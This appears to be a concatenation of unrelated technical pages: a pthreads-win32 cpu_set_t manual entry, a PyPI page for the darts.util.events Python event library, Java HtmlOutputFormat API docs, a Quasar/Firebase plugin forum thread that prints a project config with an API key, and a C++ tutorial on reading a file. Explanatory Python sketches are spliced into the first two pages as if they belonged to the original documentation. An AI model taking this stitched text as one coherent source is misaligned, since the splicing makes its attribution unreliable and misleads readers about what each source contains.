The cpu_set_t data structure represents a set of CPUs. CPU sets are used by sched_setaffinity() and pthread_setaffinity_np(), etc. The cpu_set_t data type is implemented as a bitset. However, the data structure should be treated as opaque: all manipulation of CPU sets should be done via the macros listed above. These macros either return a value consistent with the operation or nothing. These macros do not return an error status.

sched_getaffinity(3), sched_setaffinity(3), pthread_setaffinity_np(3), pthread_getaffinity_np(3).
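To make the semantics of these macros concrete, here is a small illustrative model in Python (not part of the pthreads-win32 API) that represents a CPU set as an integer bitmask, mirroring how the opaque cpu_set_t bitset behaves:

```python
# Illustrative model of the CPU_* macros: a CPU set as an int bitmask.
# (Function names mirror the macros; this is not a real binding.)

def cpu_zero():
    return 0                         # CPU_ZERO: the empty set

def cpu_set(cpu, s):
    return s | (1 << cpu)            # CPU_SET: add a CPU to the set

def cpu_clr(cpu, s):
    return s & ~(1 << cpu)           # CPU_CLR: remove a CPU from the set

def cpu_isset(cpu, s):
    return bool(s & (1 << cpu))      # CPU_ISSET: membership test

def cpu_count(s):
    return bin(s).count("1")         # CPU_COUNT: number of CPUs set

def cpu_and(a, b): return a & b     # CPU_AND: intersection
def cpu_or(a, b):  return a | b     # CPU_OR: union
def cpu_xor(a, b): return a ^ b     # CPU_XOR: mutually excluded set

s = cpu_set(3, cpu_set(0, cpu_zero()))   # {CPU 0, CPU 3}
print(cpu_count(s))                       # 2
print(cpu_isset(3, s))                    # True
print(cpu_and(s, cpu_set(3, cpu_zero())))  # 8 (only CPU 3 remains)
```

The "return a value consistent with the operation or nothing" remark above corresponds to the membership/count operations returning values while the mutating macros return nothing.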
http://sourceware.org/pthreads-win32/manual/cpu_set.html
darts.util.events 0.4 Simple C#-style event dispatcher Preface Introduction This library provides a simple event dispatcher, similar to the event construct provided by the C# language. The library has no external dependencies. It was intended for use cases, where the components emitting events and the components listening for events agree about the type of event and the semantics associated with it. This is true, for example, for event handlers, which listen on “click” events signalled by GUI button objects, or notifications signalled by objects, whenever the value of some property changes. This differs from the approach taken by, say, the PyDispatcher, which is more generic, and favours communication among weakly coupled components. Compatibility The code was mainly written for and tested with Python 2.6. It is known to work with Python 3.2. It should be compatible to 2.5 as well, but you might have to insert a few from __future__ import with_statement lines here and there (and this is generally untested). It should work (this has not been tested) with alternative implementations of Python like Jython or IronPython. Note, though, that some of the test cases defined in this file might fail due to different garbage collection implementations; this file was written with CPython in mind. Documentation Basic Usage >>> from darts.lib.utils.event import Publisher, ReferenceRetention as RR >>> some_event = Publisher() The Publisher is the main component. It acts as registry for callbacks/listeners. Let’s define a listener >>> def printer(*event_args, **event_keys): ... print event_args, event_keys In order to receive notifications, clients must subscribe to a publisher. This can be as simple as >>> some_event.subscribe(printer) #doctest: +ELLIPSIS <SFHandle ...> The result of the call to subscribe is an instance of (some subclass of) class Subscription. This value may be used later, in order to cancel the subscription, when notifications are no longer desired. 
The actual subclass is an implementation detail you should normally not care about. All you need to know (and are allowed to rely on, in fact) is that it will be an instance of class Subscription, and it will provide whatever has been documented as the public API of that class (right now: only the method cancel). Now, let's signal an event and see what happens:

>>> some_event.publish('an-event')
('an-event',) {}

As you can see, the printer has been notified of the event, and dutifully printed its arguments to the console.

Cancelling subscriptions

As mentioned, the result of calling subscribe is a special subscription object, which represents the registration of the listener with the publisher.

>>> s1 = some_event.subscribe(printer)
>>> some_event.publish('another-event')
('another-event',) {}
('another-event',) {}
>>> s1.cancel()
True
>>> some_event.publish('yet-another-one')
('yet-another-one',) {}

The publisher is fully re-entrant. That means that you can subscribe to events from within a listener, and you can cancel subscriptions in that context as well:

>>> def make_canceller(subs):
...     def listener(*unused_1, **unused_2):
...         print "Cancel", subs, subs.cancel()
...     return listener
>>> s1 = some_event.subscribe(printer)
>>> s2 = some_event.subscribe(make_canceller(s1))
>>> some_event.publish('gotta-go') #doctest: +ELLIPSIS
('gotta-go',) {}
('gotta-go',) {}
Cancel <SFHandle ...> True
>>> some_event.publish('gone') #doctest: +ELLIPSIS
('gone',) {}
Cancel <SFHandle ...> False
>>> s1.cancel()
False

The result of the call to cancel tells us that the subscription had already been undone prior to the call (by our magic cancellation listener). Generally, calling cancel multiple times is harmless; all but the first call are ignored. Let's now remove the magic I-can-cancel-stuff listener and move on:

>>> s2.cancel()
True

Using Non-Callables as callbacks

Whenever we made subscriptions above, we actually simplified things a little bit.
The full signature of the method is: def subscribe(listener[, method[, reference_retention]]) Let’s explore the method argument first. Up to now, we only used function objects as listeners. Basically, in fact, we might have used any callable object. Remember, that any object is “callable” in Python, if it provides a __call__ method, so guess, what’s the default value of the method argument? >>> s1 = some_event.subscribe(printer, method='__call__') >>> some_event.publish('foo') ('foo',) {} ('foo',) {} >>> s1.cancel() True Nothing new. So, now you might ask: when do I use a different method name? >>> class Target(object): ... def __init__(self, name): ... self.name = name ... def _callback(self, *args, **keys): ... print self.name, args, keys >>> s1 = some_event.subscribe(Target('foo')) >>> some_event.publish('Bumm!') #doctest: +ELLIPSIS Traceback (most recent call last): ... TypeError: 'Target' object is not callable Oops. Let’s remove the offender, before someone notices our mistake: >>> s1.cancel() True >>> s1 = some_event.subscribe(Target('foo'), method='_callback') >>> some_event.publish('works!') ('works!',) {} foo ('works!',) {} Reference Retention So, that’s that. There is still an unexplored argument to subscribe left, though: reference_retention. The name sounds dangerous, but what does it do? >>> listener = Target('yummy') >>> s2 = some_event.subscribe(listener, method='_callback', reference_retention=RR.WEAK) >>> some_event.publish('yow') ('yow',) {} foo ('yow',) {} yummy ('yow',) {} Hm. So far, no differences. Let’s make a simple change: >>> listener = None >>> some_event.publish('yow') ('yow',) {} foo ('yow',) {} Ah. Ok. Our yummy listener is gone. What happened? Well, by specifying a reference retention policy of WEAK, we told the publisher, that it should use a weak reference to the listener just installed, instead of the default strong reference. 
And after we released the only other known strong reference to the listener by setting listener to None, the listener was actually removed from the publisher. Note, BTW, that the above example may fail with Python implementations other than CPython, due to different policies with respect to garbage collection. The principle should remain valid, though, in Jython as well as IronPython, but in those implementations there is no guarantee that the listener is removed as soon as the last reference to it is dropped.

Of course, this all works too, if the method to be called is the default one: __call__:

>>> def make_listener(name):
...     def listener(*args, **keys):
...         print name, args, keys
...     return listener
>>> listener = make_listener('weak')
>>> s2 = some_event.subscribe(listener, reference_retention=RR.WEAK)
>>> some_event.publish('event')
('event',) {}
foo ('event',) {}
weak ('event',) {}
>>> listener = None
>>> some_event.publish('event')
('event',) {}
foo ('event',) {}

That's about all there is to know about the library. As I said above: it is simple, and might not be useful for all scenarios and use cases, but it does what it was written to do.

Error handling

The Publisher class is not intended to be subclassed. If you need to tailor the behaviour, you use policy objects/callbacks, which are passed to the constructor. Right now, there is a single adjustable policy, namely the behaviour of the publisher in case listeners raise exceptions:

>>> def toobad(event):
...     if event == 'raise':
...         raise ValueError
>>> s1 = some_event.subscribe(toobad)
>>> some_event.publish('harmless')
('harmless',) {}
foo ('harmless',) {}
>>> some_event.publish('raise')
Traceback (most recent call last):
...
ValueError

As you can see, the default behaviour is to re-raise the exception from within publish. This might not be adequate depending on the use case. In particular, it will prevent any listeners registered later from being run.
So, let’s define our own error handling: >>> def log_error(exception, value, traceback, subscription, args, keys): ... print "caught", exception >>> publisher = Publisher(exception_handler=log_error) >>> publisher.subscribe(toobad) #doctest: +ELLIPSIS <SFHandle ...> >>> publisher.subscribe(printer) #doctest: +ELLIPSIS <SFHandle ...> >>> publisher.publish('harmless') ('harmless',) {} >>> publisher.publish('raise') caught <type 'exceptions.ValueError'> ('raise',) {} As an alternative to providing the error handler at construction time, you may also provide an error handler when publishing an event, like so: >>> def log_error_2(exception, value, traceback, subscription, args, keys): ... print "caught", exception, "during publication" >>> publisher.publish_safely(log_error_2, 'raise') caught <type 'exceptions.ValueError'> during publication ('raise',) {} As you can see, the per-call error handler takes precedence over the publisher’s default error handler. Note, that there is no chaining, i.e., if the per-call error handler raises an exception, the publisher’s default handler is not called, but the exception is simply propagated outwards to the caller of publish_safely: the publisher has no way to distinguish between exceptions raised because the handler wants to abort the dispatch and exceptions raised by accident, so all exceptions raised by the handler are simply forwarded to the client application. Thread Safety The library is fully thread aware and thread safe. Thus, subscribing to a listener shared across multiple threads is safe, and so is cancelling subscriptions. Changes Version 0.4 Subscription handles now provide access to their listener objects and method names. This was added for the sake of error handling code, which wants to log exceptions and provide a better way of identifying the actual listener, which went rogue. Version 0.3 Fixed setup.py to properly proclaim the namespace packages used. Version 0.2 Error handling has been changed. 
Instead of subclassing the publisher, the default exception handler is now passed as callback to the publisher during construction. The class Publisher is now documented as “not intended for being subclassed”. - Author: Deterministic Arts - Documentation: darts.util.events package documentation - License: MIT - Categories - Development Status :: 5 - Production/Stable - Intended Audience :: Developers - License :: OSI Approved :: MIT License - Operating System :: OS Independent - Programming Language :: Python :: 2.6 - Programming Language :: Python :: 2.7 - Programming Language :: Python :: 3 - Programming Language :: Python :: 3.0 - Programming Language :: Python :: 3.1 - Topic :: Utilities - Package Index Owner: dirk.esser - DOAP record: darts.util.events-0.4.xml
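Stepping outside the changelog for a moment: the core subscribe/cancel/publish contract documented above can be sketched in a few lines. The following is a deliberately minimal re-implementation of the idea (illustrative only — it is not the darts.util.events code, and it omits weak references, thread safety, and the exception-handler policy):

```python
# Minimal sketch of a C#-style event publisher (illustration only).

class Subscription:
    def __init__(self, publisher, listener):
        self._publisher, self.listener = publisher, listener

    def cancel(self):
        # Returns True if the subscription was still active, False otherwise;
        # calling cancel() multiple times is harmless.
        if self in self._publisher._subs:
            self._publisher._subs.remove(self)
            return True
        return False

class Publisher:
    def __init__(self):
        self._subs = []

    def subscribe(self, listener, method='__call__'):
        # Resolve the named method up front, so non-callable objects with a
        # callback method can be used too (cf. the `method` argument above).
        sub = Subscription(self, getattr(listener, method))
        self._subs.append(sub)
        return sub

    def publish(self, *args, **keys):
        # Iterate over a copy so listeners may subscribe/cancel re-entrantly.
        for sub in list(self._subs):
            if sub in self._subs:      # skip subscriptions cancelled mid-dispatch
                sub.listener(*args, **keys)

events = []
p = Publisher()
s = p.subscribe(lambda *a, **k: events.append(a))
p.publish('an-event')
s.cancel()
p.publish('ignored')
print(events)   # [('an-event',)]
```

The copy-then-membership-check loop in publish is the simplest way to get the re-entrancy behaviour the doctests above demonstrate.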
https://pypi.python.org/pypi/darts.util.events
javax.faces.component.html
Class HtmlOutputFormat

public class HtmlOutputFormat

Represents a component that looks up a localized message in a resource bundle, optionally uses it as a MessageFormat pattern string and substitutes in parameter values from nested UIParameter components, and renders the result. If the "dir" or "lang" attributes are present, render a span element and pass them through as attributes on the span.

By default, the rendererType property must be set to "javax.faces.Format". This value can be changed by calling the setRendererType() method.

public static final String COMPONENT_TYPE
The standard component type for this component.

public HtmlOutputFormat()

public String getDir()
Return the value of the dir property. Contents: Direction indication for text that does not inherit directionality. Valid values are "LTR" (left-to-right) and "RTL" (right-to-left).

public void setDir(String dir)
Set the value of the dir property.

public boolean isEscape()
Return the value of the escape property. Contents: Flag indicating that characters that are sensitive in HTML and XML markup must be escaped. This flag is set to "true" by default.

public void setEscape(boolean escape)
Set the value of the escape property.

public String getLang()
Return the value of the lang property. Contents: Code describing the language used in the generated markup for this component.

public void setLang(String lang)
Set the value of the lang property.

public String getStyle()
Return the value of the style property. Contents: CSS style(s) to be applied when this component is rendered.

public void setStyle(String style)
Set the value of the style property.

public String getStyleClass()
Return the value of the styleClass property. Contents: Space-separated list of CSS style class(es) to be applied when this element is rendered. This value must be passed through as the "class" attribute on generated markup.
public void setStyleClass(String styleClass)
Set the value of the styleClass property.

public String getTitle()
Return the value of the title property. Contents: Advisory title information about markup elements generated for this component.

public void setTitle(String title)
Set the value of the title property.

public Object saveState(FacesContext _context)
Overrides: saveState in class UIOutput

public void restoreState(FacesContext _context, Object _state)
Specified by: restoreState in interface StateHolder
Overrides: restoreState in class UIOutput

Copyright 2007 Sun Microsystems, Inc. All rights reserved. Use is subject to license terms.
https://docs.oracle.com/javaee/5/api/javax/faces/component/html/HtmlOutputFormat.html
Using firebase as plugin in Quasar 0.15

I'm trying to add firebase as a plugin, following the guide as explained in the axios example, but I don't have positive results. When I try to call firebase.auth() from my router I get a console error saying that this.$auth is undefined.

My firebase.js plugin:

// import something here
import * as firebase from 'firebase'

// leave the export, even if you don't use it
export default ({ router, Vue }) => {
  // something to do
  const config = {
    apiKey: 'AIzaSyBzzE4ISXNiIB0c8g6rv8kxSOk0dlgL3qc',
    authDomain: 'okinoi-94a39.firebaseapp.com',
    databaseURL: '',
    projectId: 'okinoi-94a39',
    storageBucket: 'okinoi-94a39.appspot.com',
    messagingSenderId: '758988975300'
  }
  const firebaseApp = firebase.initializeApp(config)
  Vue.prototype.$auth = firebaseApp.auth()
}

I added it to the quasar.conf.js file in the plugins array as 'firebase', and called the function in the router's index.js by writing this.$auth.

Any idea or example of how we can implement firebase auth in the latest Quasar version?

Steps from the github issue:

- create plugin
- change code to

import * as firebase from 'firebase'

const config = {
  apiKey: '...',
  authDomain: '...',
  databaseURL: '...',
  projectId: '...',
  storageBucket: '...',
  messagingSenderId: '...'
}

const fireApp = firebase.initializeApp(config)

export const AUTH = fireApp.auth()

export default ({ app, router, Vue }) => {
  Vue.prototype.$auth = AUTH
}

and use it

there is also a starterkit for quasar & firebase:
I just pushed several improvements. Feel free to clone or download it.

@cristalt said in Using firebase as plugin in Quasar 0.15:

I just pushed several improvements. Feel free to clone or download it.

I tried it and I've got an error. I'm using Quasar v0.17, can you help me?

@cristalt said in Using firebase as plugin in Quasar 0.15:

@justdior let's do it! Tell me more about it. What kind of error have you got?

This is the error I've got when I install the repo. Steps to reproduce:

yarn install v1.12.3
$ quasar -v
0.17.22
$ node -v
v11.3.0
$ yarn
error upath@1.0.4: The engine "node" is incompatible with this module. Expected version ">=4 <=9". Got "11.3.0"
error Found incompatible module
info Visit for documentation about this command.

Same error when using npm too.

The error is not related to the repo. Quasar CLI uses yarn to create the project, and the node version you have is incompatible with the installed yarn version. As the log says, the node version must be ">=4 <=9". I've run into the same error locally a while ago. I recommend you change the node version; if you have nvm, that's very easy. Then reinstall Yarn and Quasar CLI under the newly selected node version; 8.9.0 will work. Hope it helps you.
https://forum.quasar-framework.org/topic/1970/using-firebase-as-plugin-in-quasar-0-15/1
#include <Arena.H> A Virtual Base Class for Dynamic Memory Management This is a virtual base class for objects that manage their own dynamic memory allocation. Since it is a virtual base class, you have to derive something from it to use it. Allocate a dynamic memory arena of size a_sz. A pointer to this memory should be returned. Implemented in BArena, and CArena. Referenced by BaseFab< T >::define(). A pure virtual function for deleting the arena pointed to by a_pt. Implemented in BArena, and CArena. Referenced by BaseFab< T >::undefine(). Given a minimum required arena size of a_sz bytes, this returns the next largest arena size that will hold an integral number of objects of the largest of the types void*, long, double and function pointer.
http://davis.lbl.gov/Manuals/CHOMBO-RELEASE-3.2/classArena.html
By Chris Wendt on October 15, 2018 We’re happy to announce that Sourcegraph extensions are ready for early adopters to start writing their own extensions. Sourcegraph extensions allow you to extend code hosts like GitHub in the same way that editor extensions allow you to extend editors. Once you write an extension, it runs anywhere you see code (e.g. GitHub). Here’s an extension that shows a tooltip when you hover over code: import * as sourcegraph from "sourcegraph"; export function activate(): void { sourcegraph.languages.registerHoverProvider(["*"], { provideHover: () => ({ contents: { value: "Hello, world! 🎉🎉🎉" } }) }); } Here’s another extension that adds a link to the npm registry next to import/require statements in JavaScript/TypeScript code: When you publish your extension to the Sourcegraph.com extension registry, anyone can install and instantly start using it. (Sourcegraph Enterprise supports a private extension registry.) Next steps: src extensions publishcommand for publishing Sourcegraph extensions
https://about.sourcegraph.com/blog/extension-authoring/
> Cimage.zip > GIFDECOD.C

#include "stdafx.h"
#include "gifdecod.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

static LONG code_mask[13] =
{
    0,
    0x0001, 0x0003, 0x0007, 0x000F,
    0x001F, 0x003F, 0x007F, 0x00FF,
    0x01FF, 0x03FF, 0x07FF, 0x0FFF
};

/* This function initializes the decoder for reading a new image. */
SHORT GIFDecoder::init_exp(SHORT size)
{
    curr_size = size + 1;
    top_slot = 1 << curr_size;
    clear = 1 << size;
    ending = clear + 1;
    slot = newcodes = ending + 1;
    navail_bytes = nbits_left = 0;
    return(0);
}

/* get_next_code()
 * - gets the next code from the GIF file.  Returns the code, or else
 *   a negative number in case of file errors...
 */
SHORT GIFDecoder::get_next_code()
{
    SHORT i, x;
    ULONG ret;

    if (nbits_left == 0)
    {
        if (navail_bytes <= 0)
        {
            /* Out of bytes in the current block, so read the next block */
            pbytes = byte_buff;
            if ((navail_bytes = get_byte()) < 0)
                return(navail_bytes);
            else if (navail_bytes)
            {
                for (i = 0; i < navail_bytes; ++i)
                {
                    if ((x = get_byte()) < 0)
                        return(x);
                    byte_buff[i] = x;
                }
            }
        }
        b1 = *pbytes++;
        nbits_left = 8;
        --navail_bytes;
    }

    ret = b1 >> (8 - nbits_left);
    while (curr_size > nbits_left)
    {
        if (navail_bytes <= 0)
        {
            /* Out of bytes in the current block, so read the next block */
            pbytes = byte_buff;
            if ((navail_bytes = get_byte()) < 0)
                return(navail_bytes);
            else if (navail_bytes)
            {
                for (i = 0; i < navail_bytes; ++i)
                {
                    if ((x = get_byte()) < 0)
                        return(x);
                    byte_buff[i] = x;
                }
            }
        }
        b1 = *pbytes++;
        ret |= b1 << nbits_left;
        nbits_left += 8;
        --navail_bytes;
    }
    nbits_left -= curr_size;
    ret &= code_mask[curr_size];
    return((SHORT)(ret));
}

/* The reason we have these separated like this instead of using
 * a structure like the original Wilhite code did, is because this
 * stuff generally produces significantly faster code when compiled...
 * This code is full of similar speedups... (For a good book on writing
 * C for speed or for space optimisation, see Efficient C by Tom Plum,
 * published by Plum-Hall Associates...)
 */
LOCAL byte stack[MAX_CODES + 1];    /* Stack for storing pixels */
LOCAL byte suffix[MAX_CODES + 1];   /* Suffix table */
LOCAL USHORT prefix[MAX_CODES + 1]; /* Prefix linked list */

/* SHORT decoder(linewidth)
 * SHORT linewidth;            * Pixels per line of image *
 *
 * - This function decodes an LZW image, according to the method used
 * in the GIF spec.  Every *linewidth* "characters" (ie. pixels) decoded
 * will generate a call to out_line(), which is a user specific function
 * to display a line of pixels.
 * The function gets its codes from
 * get_next_code() which is responsible for reading blocks of data and
 * separating them into the proper size codes.  Finally, get_byte() is
 * the global routine to read the next byte from the GIF file.
 *
 * It is generally a good idea to have linewidth correspond to the actual
 * width of a line (as specified in the Image header) to make your own
 * code a bit simpler, but it isn't absolutely necessary.
 *
 * Returns: 0 if successful, else negative.  (See ERRS.H)
 */
SHORT GIFDecoder::decoder(SHORT linewidth, INT& bad_code_count)
{
    FAST byte *sp, *bufptr;
    byte *buf;
    FAST SHORT code, fc, oc, bufcnt;
    SHORT c, size, ret;

    /* Initialize for decoding a new image... */
    bad_code_count = 0;
    if ((size = get_byte()) < 0)
        return(size);
    if (size < 2 || 9 < size)
        return(BAD_CODE_SIZE);
    /* out_line = outline;*/
    init_exp(size);
    // printf("L %d %x\n",linewidth,size);

    /* Initialize in case they forgot to put in a clear code.
     * (This shouldn't happen, but we'll try and decode it anyway...)
     */
    oc = fc = 0;

    /* Allocate space for the decode buffer */
    if ((buf = new byte[linewidth + 1]) == NULL)
        return(OUT_OF_MEMORY);

    /* Set up the stack pointer and decode buffer pointer */
    sp = stack;
    bufptr = buf;
    bufcnt = linewidth;

    /* This is the main loop.  For each code we get we pass through the
     * linked list of prefix codes, pushing the corresponding "character" for
     * each code onto the stack.  When the list reaches a single "character"
     * we push that on the stack too, and then start unstacking each
     * character for output in the correct order.  Special handling is
     * included for the clear code, and the whole thing ends when we get
     * an ending code.
     */
    while ((c = get_next_code()) != ending)
    {
        /* If we had a file error, return without completing the decode */
        if (c < 0)
        {
            delete[] buf;
            return(0);
        }

        /* If the code is a clear code, reinitialize all necessary items. */
        if (c == clear)
        {
            curr_size = size + 1;
            slot = newcodes;
            top_slot = 1 << curr_size;

            /* Continue reading codes until we get a non-clear code
             * (Another unlikely, but possible case...)
             */
            while ((c = get_next_code()) == clear)
                ;

            /* If we get an ending code immediately after a clear code
             * (Yet another unlikely case), then break out of the loop.
             */
            if (c == ending)
                break;

            /* Finally, if the code is beyond the range of already set codes,
             * (This one had better NOT happen... I have no idea what will
             * result from this, but I doubt it will look good...) then set it
             * to color zero.
             */
            if (c >= slot)
                c = 0;
            oc = fc = c;

            /* And let us not forget to put the char into the buffer... And
             * if, on the off chance, we were exactly one pixel from the end
             * of the line, we have to send the buffer to the out_line()
             * routine...
             */
            *bufptr++ = c;
            if (--bufcnt == 0)
            {
                if ((ret = out_line(buf, linewidth)) < 0)
                {
                    delete[] buf;
                    return(ret);
                }
                bufptr = buf;
                bufcnt = linewidth;
            }
        }
        else
        {
            /* In this case, it's not a clear code or an ending code, so
             * it must be a code code... So we can now decode the code into
             * a stack of character codes. (Clear as mud, right?)
             */
            code = c;

            /* Here we go again with one of those off chances... If, on the
             * off chance, the code we got is beyond the range of those already
             * set up (Another thing which had better NOT happen...) we trick
             * the decoder into thinking it actually got the last code read.
             * (Hmmn... I'm not sure why this works... But it does...)
             */
            if (code >= slot)
            {
                if (code > slot)
                    ++bad_code_count;
                code = oc;
                *sp++ = fc;
            }

            /* Here we scan back along the linked list of prefixes, pushing
             * helpless characters (ie. suffixes) onto the stack as we do so.
             */
            while (code >= newcodes)
            {
                *sp++ = suffix[code];
                code = prefix[code];
            }

            /* Push the last character on the stack, and set up the new
             * prefix and suffix, and if the required slot number is greater
             * than that allowed by the current bit size, increase the bit
             * size.  (NOTE - If we are all full, we *don't* save the new
             * suffix and prefix... I'm not certain if this is correct...
             * it might be more proper to overwrite the last code...
             */
            *sp++ = code;
            if (slot < top_slot)
            {
                suffix[slot] = fc = code;
                prefix[slot++] = oc;
                oc = c;
            }
            if (slot >= top_slot)
                if (curr_size < 12)
                {
                    top_slot <<= 1;
                    ++curr_size;
                }

            /* Now that we've pushed the decoded string (in reverse order)
             * onto the stack, lets pop it off and put it into our decode
             * buffer... And when the decode buffer is full, write another
             * line...
             */
            while (sp > stack)
            {
                *bufptr++ = *(--sp);
                if (--bufcnt == 0)
                {
                    if ((ret = out_line(buf, linewidth)) < 0)
                    {
                        delete[] buf;
                        return(ret);
                    }
                    bufptr = buf;
                    bufcnt = linewidth;
                }
            }
        }
    }
    ret = 0;
    if (bufcnt != linewidth)
        ret = out_line(buf, (linewidth - bufcnt));
    delete[] buf;
    return(ret);
}
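The variable-width code stream that get_next_code() parses can be modelled compactly. The following Python sketch (an illustration, not part of this C++ source) packs fixed-width codes least-significant-bit first — the bit order a GIF LZW stream uses — and unpacks them with a bit accumulator, mirroring how get_next_code() accumulates bits from b1 and masks with code_mask[]. For simplicity it uses a fixed code size, whereas the real decoder grows curr_size as the code table fills:

```python
def pack_codes(codes, size):
    """Pack fixed-width codes into bytes, least-significant bits first."""
    acc, nbits, out = 0, 0, bytearray()
    for c in codes:
        acc |= c << nbits
        nbits += size
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    if nbits:                         # flush any remaining partial byte
        out.append(acc & 0xFF)
    return bytes(out)

def unpack_codes(data, size, count):
    """Recover codes from an LSB-first bit stream, like get_next_code()."""
    acc, nbits, pos, out = 0, 0, 0, []
    for _ in range(count):
        while nbits < size:           # refill the accumulator from the stream
            acc |= data[pos] << nbits
            pos += 1
            nbits += 8
        out.append(acc & ((1 << size) - 1))   # mask off one code (cf. code_mask[])
        acc >>= size
        nbits -= size
    return out

codes = [5, 1, 7, 0, 3]
packed = pack_codes(codes, 3)
print(list(packed))                   # [205, 49]
print(unpack_codes(packed, 3, 5))     # [5, 1, 7, 0, 3]
```

The round trip makes the key point visible: a code can straddle a byte boundary, which is exactly why get_next_code() keeps the nbits_left/b1 state between calls.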
http://read.pudn.com/downloads/sourcecode/graph/1410/CIMAGE/GIFDECOD.CPP__.htm
Debugging RxJS, Part 1: Tooling I’m moving away from Medium. This article, its updates and more recent articles are hosted on my personal blog: ncjamieson.com. I’m an RxJS convert and I’m using it in all of my active projects. With it, many things that I once found to be tedious are now straightforward. However, there is one thing that isn’t: debugging. The compositional and sometimes-asynchronous nature of RxJS can make debugging something of a challenge: there isn’t much state to inspect; and the call stack is rarely helpful. The approach I’ve used in the past has been to sprinkle do operators and logging throughout the codebase — to inspect the values that flow through composed observables. For a number of reasons, this approach is not one with which I’ve been satisfied: - I always seem to have to add more logging, changing the code whilst debugging it; - once debugged, I either have to remove the logging or put up with spurious output; - conditional logging to avoid said output looks pretty horrid when slapped in the middle of a nicely composed observable; - even with a dedicated logoperator, the experience is still less than ideal. Recently, I set aside some time to build a debugging tool for RxJS. There were a number of features that I felt the tool must have: - it should be as unobtrusive as possible; - it should not be necessary to have to continually modify code to debug it; - in particular, it should not be necessary to have to delete or comment out debugging code after the problem is solved; - it should support logging that can be easily enabled and disabled; - it should support capturing snapshots that can be compared over time; - it should offer some integration with the browser console — for switching debugging features on/off and for investigating state, etc. 
And some more that would be nice to have: - it should support pausing observables; - it should support modifying observables or the values they emit; - it should support logging mechanisms other than the console; - it should be extensible; - it should go some way towards capturing the data required to visualize subscription dependencies. With those features in mind, I built rxjs-spy. Core Concepts rxjs-spy introduces a tag operator that associates a string tag with an observable. The operator does not change the observable’s behaviour or values in any way. The tag operator can be used alone — import "rxjs-spy/add/operator/tag" — and the other rxjs-spy methods can be omitted from production builds, so the only overhead is the string annotations. Most of the tool’s methods accept matchers that determine to which tagged observables they will apply. Matchers can be simple strings, regular expressions or predicates that are passed the tag itself. When the tool is configured via a call to its spy method, it patches Observable.prototype.subscribe so that it is able to spy on all subscriptions, notifications and unsubscriptions. That does mean, however, that only observables that have been subscribed to will be seen by the spy. rxjs-spy exposes a module API that is intended to be called from code and a console API that is intended for interactive use in the browser’s console. Most of the time, I make a call to the module API's spy method early in the application’s start-up code and perform the remainder of the debugging using the console API. Console API Functionality When debugging, I usually use the browser’s console to inspect and manipulate tagged observables. The console API functionality is most easily explained by example — and the examples that follow work with the observables in this code: The console API in rxjs-spy is exposed via the rxSpy global. 
Calling rxSpy.show() will display a list of all tagged observables, indicating their state (incomplete, complete or errored), the number of subscribers and the most recently emitted value (if one has been emitted). The console output will look something like this: To show the information for only a specific tagged observable, a tag name or a regular expression can be passed to show: Logging can be enabled for tagged observables by calling rxSpy.log: Calling log with no arguments will enable the logging of all tagged observables. Most methods in the module API return a teardown function that can be called to undo the method call. In the console, that’s tedious to manage, so there is an alternative. Calling rxSpy.undo() will display a list of the methods that have been called: Calling rxSpy.undo and passing the number associated with the method call will see that call’s teardown function called. For example, calling rxSpy.undo(3) will see the logging of the interval observable undone: Sometimes, it’s useful to modify an observable or its values whilst debugging. The console API includes a let method that functions in much the same way as the RxJS let operator. It’s implemented in such a way that calls to the let method will affect both current and future subscribers the to tagged observable. For example, the following call will see the people observable emit mallory — instead of alice or bob: As with the log method, calls to the let method can be undone: Being able to pause an observable when debugging is something that’s become almost indispensable, for me. Calling rxSpy.pause will pause a tagged observable and will return a deck that can be used to control and inspect the observable’s notifications: Calling log on the deck will display the whether or not the observable is paused and will display the paused notifications. (The notifications are RxJS Notification instances obtained using the materialize operator). 
Calling step on the deck will emit a single notification:

Calling resume will emit all paused notifications and will resume the observable:

Calling pause will see the observable placed back into a paused state:

It's easy to forget to assign the returned deck to a variable, so the console API includes a deck method that behaves in a similar manner to the undo method. Calling it will display a list of the pause calls:

Calling it and passing the number associated with the call will see the associated deck returned:

Like the log and let calls, the pause calls can be undone. And undoing a pause call will see the tagged observable resumed:

Hopefully, the above examples will have provided an overview of rxjs-spy and its console API. The follow-up parts of Debugging RxJS will focus on specific features of rxjs-spy and how they can be used to solve actual debugging problems. For me, rxjs-spy has certainly made debugging RxJS significantly less tedious.

More Information

The code for rxjs-spy is available on GitHub and there is an online example of its console API. The package is available for installation via NPM.

For the next article in this series, see Debugging RxJS, Part 2: Logging.
https://medium.com/angular-in-depth/debugging-rxjs-4f0340286dd3
C++ Reading from a file Program

Hello Everyone! In this tutorial, we will learn how to open and read the contents of a file, in the C++ programming language. To understand this concept from basics, we will highly recommend you to refer to this: C++ File Stream, where we have discussed this concept and the various terminologies involved in it, in detail.

The step by step commented code can be seen below:

Code:

#include <iostream>
#include <fstream> // to make use of system defined functions for file handling

using namespace std;

int main()
{
    cout << "\n\nWelcome to Studytonight :-)\n\n\n";
    cout << " ===== Program to demonstrate how to read the contents from a file ===== \n\n";

    // declaration of a string variable
    string str;

    // creating a variable of type ifstream to make use of file handling commands and open a file in read mode.
    ifstream in;

    // open is a system defined method to open and read from the mentioned file
    // Make sure that the file is within the same folder as that of this program;
    // otherwise, you will have to provide the entire path to the file to read from.
    in.open("studytonight.txt");

    cout << "Reading content from the file and it's contents are: \n\n";

    // printing the data word by word
    while (in >> str)
        cout << str << " ";

    cout << "\n\n\n";

    // close the file opened before.
    in.close();

    return 0;
}

The contents of the studytonight.txt file are:

Studytonight: Our mission is to empower young Students to be the inventors and creators.

Output:

We hope that this post helped you develop a better understanding of the concept of reading the contents from a file, in C++. For any query, feel free to reach out to us via the comments section down below. Keep Learning : )
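For comparison, the same word-by-word read can be expressed in a few lines of Python. This is not part of the original C++ tutorial, just a side-by-side sketch: `f.read().split()` produces the same whitespace-delimited tokens that the `in >> str` loop extracts.

```python
import os
import tempfile

# Create the sample file the tutorial reads from.
path = os.path.join(tempfile.mkdtemp(), "studytonight.txt")
with open(path, "w") as f:
    f.write("Studytonight: Our mission is to empower young Students "
            "to be the inventors and creators.")

# Equivalent of `while (in >> str)`: read whitespace-delimited words.
with open(path) as f:
    words = f.read().split()

print(" ".join(words))
```

As in the C++ version, any run of whitespace (spaces, newlines, tabs) separates tokens, so the output is the file's words joined by single spaces.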
